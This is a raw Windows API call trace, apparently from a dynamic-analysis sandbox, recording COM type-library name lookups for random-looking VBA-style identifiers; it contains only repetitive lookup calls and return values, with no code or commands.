ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KAABQAG", lHashVal=0x101c6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.427] IUnknown:Release (This=0x665ba50) returned 0xd [0069.427] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.427] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KAABQAG", lHashVal=0x101c6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.427] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.427] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.427] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KAABQAG", lHashVal=0x101c6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.427] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.427] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.427] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KAABQAG", lHashVal=0x101c6d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.427] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a6e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="KAABQAG") returned 8 [0069.427] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KAABQAG", lHashVal=0x101c6d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.427] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.427] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80a6e | out: _Dst=0x67c2d40) returned 0x0 [0069.428] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KAABQAG") returned 0x101070 [0069.428] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_KAABQAG" | out: _Dst="_B_var_KAABQAG") returned 0x0 [0069.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_KAABQAG") returned 15 [0069.428] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.428] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KAABQAG", lHashVal=0x101070, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.428] IUnknown:Release (This=0x665ba50) returned 0xd [0069.428] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.428] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KAABQAG", lHashVal=0x101070, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.428] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.428] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.428] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KAABQAG", lHashVal=0x101070, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.428] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.428] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.428] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KAABQAG", lHashVal=0x101070, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.428] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.428] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.428] IUnknown:Release (This=0x665ba50) returned 0xd [0069.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12b0e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_KAABQAG") returned 15 [0069.428] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KAABQAG", lHashVal=0x101070, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x51004200000000, pDummy=0x0) returned 0x0 [0069.428] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80a6e | out: _Dst=0x144ec0) returned 0x0 [0069.428] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JUwxAAA", lHashVal=0x103a2b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80abe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JUwxAAA") returned 8 [0069.428] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JUwxAAA", lHashVal=0x103a2b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80abe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JUwxAAA") returned 8 [0069.429] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JUwxAAA", lHashVal=0x103a2b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JUwxAAA") returned 0x103a2b [0069.429] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="JUwxAAA" | out: _Dst="JUwxAAA") returned 0x0 [0069.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="JUwxAAA") returned 8 [0069.429] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.429] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JUwxAAA", lHashVal=0x103a2b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.429] IUnknown:Release (This=0x665ba50) returned 0xd [0069.429] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.429] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JUwxAAA", lHashVal=0x103a2b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.429] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.429] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.429] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JUwxAAA", lHashVal=0x103a2b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.429] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.429] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.429] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JUwxAAA", lHashVal=0x103a2b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.429] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80abe, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="JUwxAAA") returned 8 [0069.429] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JUwxAAA", lHashVal=0x103a2b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.429] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.429] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80abe | out: _Dst=0x67c2d40) returned 0x0 [0069.429] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JUwxAAA") returned 0x103daf [0069.429] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_JUwxAAA" | out: _Dst="_B_var_JUwxAAA") returned 0x0 [0069.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_JUwxAAA") returned 15 [0069.429] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.429] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JUwxAAA", lHashVal=0x103daf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.429] IUnknown:Release (This=0x665ba50) returned 0xd [0069.429] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.429] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JUwxAAA", lHashVal=0x103daf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.430] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.430] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.430] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JUwxAAA", lHashVal=0x103daf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.430] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.430] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.430] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JUwxAAA", lHashVal=0x103daf, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.430] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.430] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.430] IUnknown:Release (This=0x665ba50) returned 0xd [0069.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12b3e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_JUwxAAA") returned 15 [0069.430] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JUwxAAA", lHashVal=0x103daf, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x41007800000000, pDummy=0x0) returned 0x0 [0069.430] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80abe | out: _Dst=0x144ec0) returned 0x0 [0069.430] ITypeComp:RemoteBind (in: This=0x665ba60, szName="OBAoc1G", lHashVal=0x10df79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a96, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OBAoc1G") returned 8 [0069.430] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="OBAoc1G", lHashVal=0x10df79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a96, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OBAoc1G") returned 8 [0069.430] ITypeComp:RemoteBind (in: This=0x665bd30, szName="OBAoc1G", lHashVal=0x10df79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.430] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OBAoc1G") returned 0x10df79 [0069.430] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="OBAoc1G" | out: _Dst="OBAoc1G") returned 0x0 [0069.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="OBAoc1G") returned 8 [0069.430] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.430] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="OBAoc1G", lHashVal=0x10df79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.430] IUnknown:Release (This=0x665ba50) returned 0xd [0069.431] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.431] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="OBAoc1G", lHashVal=0x10df79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.431] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.431] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.431] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="OBAoc1G", lHashVal=0x10df79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.431] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.431] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.431] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="OBAoc1G", lHashVal=0x10df79, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.431] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80a96, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="OBAoc1G") returned 8 [0069.431] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="OBAoc1G", lHashVal=0x10df79, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.431] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.431] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b80a96 | out: _Dst=0x67c2d40) returned 0x0 [0069.431] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_OBAoc1G") returned 0x10e2fd [0069.431] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_OBAoc1G" | out: _Dst="_B_var_OBAoc1G") returned 0x0 [0069.431] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_OBAoc1G") returned 15 [0069.431] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.431] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_OBAoc1G", lHashVal=0x10e2fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.431] IUnknown:Release (This=0x665ba50) returned 0xd [0069.431] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.431] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_OBAoc1G", lHashVal=0x10e2fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.431] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.431] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.431] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_OBAoc1G", lHashVal=0x10e2fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.431] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.431] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.431] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_OBAoc1G", lHashVal=0x10e2fd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.431] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.431] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.432] IUnknown:Release (This=0x665ba50) returned 0xd [0069.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12b6e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_OBAoc1G") returned 15 [0069.432] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_OBAoc1G", lHashVal=0x10e2fd, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x63006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4f005f00720061, ppTypeComp=0x63006f00000000, pDummy=0x0) returned 0x0 [0069.432] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b80a96 | out: _Dst=0x144ec0) returned 0x0 [0069.432] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cXQ4GA", lHashVal=0x10b60a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b12, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cXQ4GA") returned 7 [0069.432] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cXQ4GA", lHashVal=0x10b60a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b12, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cXQ4GA") returned 7 [0069.432] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cXQ4GA", lHashVal=0x10b60a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.432] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cXQ4GA") returned 0x10b60a [0069.432] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="cXQ4GA" | out: _Dst="cXQ4GA") returned 0x0 [0069.432] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="cXQ4GA") returned 7 [0069.432] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.432] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cXQ4GA", lHashVal=0x10b60a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.432] IUnknown:Release (This=0x665ba50) returned 0xd [0069.432] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.432] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cXQ4GA", lHashVal=0x10b60a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.432] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.432] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.432] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cXQ4GA", lHashVal=0x10b60a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.432] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.432] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.432] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cXQ4GA", lHashVal=0x10b60a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.433] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b12, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cXQ4GA") returned 7 [0069.433] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cXQ4GA", lHashVal=0x10b60a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.433] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.433] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b80b12 | out: _Dst=0x67c2d40) returned 0x0 [0069.433] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cXQ4GA") returned 0x103074 [0069.433] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_cXQ4GA" | out: _Dst="_B_var_cXQ4GA") returned 0x0 [0069.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_cXQ4GA") returned 14 [0069.433] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.433] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cXQ4GA", lHashVal=0x103074, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.433] IUnknown:Release (This=0x665ba50) returned 0xd [0069.433] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.433] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cXQ4GA", lHashVal=0x103074, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.433] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.433] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.433] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cXQ4GA", lHashVal=0x103074, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.433] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.433] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.433] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cXQ4GA", lHashVal=0x103074, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.433] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.433] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.433] IUnknown:Release (This=0x665ba50) returned 0xd [0069.433] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12b9e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_cXQ4GA") returned 14 [0069.433] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cXQ4GA", lHashVal=0x103074, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x47003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x47003400000000, pDummy=0x0) returned 0x0 [0069.433] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b80b12 | out: _Dst=0x144ec0) returned 0x0 [0069.433] ITypeComp:RemoteBind (in: This=0x665ba60, szName="fDQcCx4A", lHashVal=0x10c360, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.434] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80b3a, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="fDQcCx4A") returned 9 